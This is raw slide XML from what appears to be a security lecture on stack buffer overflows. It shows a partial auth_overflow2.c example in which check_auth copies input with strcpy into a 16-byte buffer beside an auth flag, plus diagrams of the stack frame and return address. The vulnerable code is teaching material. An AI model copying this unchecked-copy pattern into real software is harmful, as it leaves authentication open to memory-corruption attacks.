              <a:t>back to the auth_overflow2.c (page 126 in HAOE)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="61111"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="78571"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="1400"/>
              <a:t>int check_auth(char *password){</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="78571"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1400"/>
              <a:t>  char password_buffer[16];</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="78571"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1400"/>
              <a:t>  int auth_flag = 0;  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="78571"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1400"/>
              <a:t>  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="78571"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1400"/>
              <a:t>  strcpy(password_buffer, password);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="78571"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1400"/>
              <a:t>  ...</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="78571"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1400"/>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="78571"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1400"/>
              <a:t>  return auth_flag;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1400"/>
              <a:t>}</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1400"/>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="1400"/>
              <a:t>int main(int argc, char *argv[]){</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1400"/>
              <a:t>  ...</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1400"/>
              <a:t>  if(check_auth(argv[1]) ){</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1400"/>
              <a:t>	// access granted</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1400"/>
              <a:t>	}</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="78571"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1400"/>
              <a:t>}</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="549" name="Shape 549"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4054500" y="2192650"/>
            <a:ext cx="4003200" cy="3727800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="91425" lIns="91425" rIns="91425" wrap="square" tIns="91425">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>The stack is a LIFO structure</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="550" name="Shape 550"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6545250" y="1757700"/>
            <a:ext cx="2050200" cy="4770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rPr lang="en"/>
              <a:t>auth_flag variable</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>------------------------------</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>password_buffer variable</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>------------------------------</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en"/>
            </a:br>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>saved frame pointer (SFP)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>------------------------------</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>return address (ret)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>------------------------------</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>*password(function argument)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>------------------------------</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="0000FF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="0000FF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>main()'s stack frame</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="0000FF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>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Shape 555"/>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Stack Frame Structure</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="556" name="Shape 556"/>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lang="en"/>
              <a:t> each stack frame contains</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="0" marL="457200" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buFont typeface="Arial"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>local variables for that function</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="0" marL="457200" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buFont typeface="Arial"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>the return address</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="1" marL="914400" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buFont typeface="Courier New"/>
              <a:buChar char="o"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>so EIP can be restored</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>When a function returns (finishes)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="0" marL="457200" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buFont typeface="Arial"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>the stack frame is popped off</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="0" marL="457200" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buFont typeface="Arial"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>and return address is used </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>	to restore the EIP</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en"/>
              <a:t>If we can alter the return address, we can return</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en"/>
              <a:t>to other places in memory</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>    what could go wrong??? :)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="557" name="Shape 557"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6545250" y="1757700"/>
            <a:ext cx="2050200" cy="4770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t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>------------------------------</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>local vars</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>------------------------------</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en"/>
            </a:br>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>saved frame pointer (SFP)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>------------------------------</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>return address (ret)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>------------------------------</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>function arguments</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>------------------------------</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="0000FF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="0000FF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>previous function()'s stack frame</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="0000FF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>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Shape 562"/>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rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Stack Frame Structure</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="563" name="Shape 563"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1723050"/>
            <a:ext cx="8229600" cy="4840200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="91425" lIns="91425" rIns="91425" wrap="square" tIns="91425">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="564" name="Shape 564"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6545250" y="1757700"/>
            <a:ext cx="2050200" cy="4770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t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>------------------------------</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>local vars</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>------------------------------</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en"/>
            </a:br>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>saved frame pointer (SFP)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>------------------------------</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>return address (ret)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>------------------------------</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>function arguments</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>------------------------------</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="0000FF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="0000FF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>previous function()'s stack frame</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="0000FF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="565" name="Shape 565"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
